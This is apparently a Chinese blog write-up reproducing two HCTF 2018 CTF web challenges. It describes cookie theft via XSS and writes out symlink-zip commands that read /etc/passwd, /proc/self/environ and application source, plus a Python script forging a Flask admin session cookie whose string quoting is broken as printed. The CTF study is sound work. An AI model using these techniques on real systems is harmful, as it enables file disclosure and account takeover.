首页 > 其他 > 详细

hctf2018wp复现

时间:2018-11-13 02:03:03      阅读:199      评论:0      收藏:0      [点我收藏+]

1、bottle

登陆网站后存在提交url的地方

技术分享图片

 

测试发生存在如下paload:

技术分享图片

 验证码部分可以生成1-10000的Md5值 ,构造如下payload:

技术分享图片

下面这个图就是打到自己的cookie。如果将这个payload提交到url那里,也就是xss bot存在的地方 就能打到管理员的cookie:

技术分享图片

 2、hide and seek

软链漏洞:

ln -s /etc/passwd 1.txt
zip -y 1.zip 1.txt
就能得到/etc/passwd源码
ln -s /proc/self/environ 1.txt
zip -y 1.zip 1.txt
得到配置
ln -s /app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py 1.txt
zip -y 1.zip 1.txt
把1.zip上传就能拿到源码

当已知flask的secret_key已知时就能伪造管理员的session
random.seed(uuid.getnode())
app = Flask(__name__)
app.config[‘SECRET_KEY‘] = str(random.random()*100)
得到secret_key=11.935137566861131

伪造admin session的脚本:
import hmac
from hashlib import sha1
from itsdangerous import *

def session_serializer(secret_key):
    signer_kwargs = dict(
        key_derivation=hmac,
        digest_method=sha1
    )
    Serializer = URLSafeTimedSerializer(secret_key, salt=cookie-session,
                                  signer_kwargs=signer_kwargs)
    data = {username: admin}
    return Serializer.dumps(data)

if __name__ == __main__:
    secret_key = 11.935137566861131
    print session_serializer(secret_key)

该cookie通过.分割,分成了三部分:内容序列化+时间+防篡改值https://www.aliyun.com/jiaocheng/491548.html

参考链接:

https://www.jianshu.com/p/8f5ba751aa0f

http://wiki.ioin.in/post/group/18NJ

hctf2018wp复现

原文:https://www.cnblogs.com/afanti/p/9949660.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!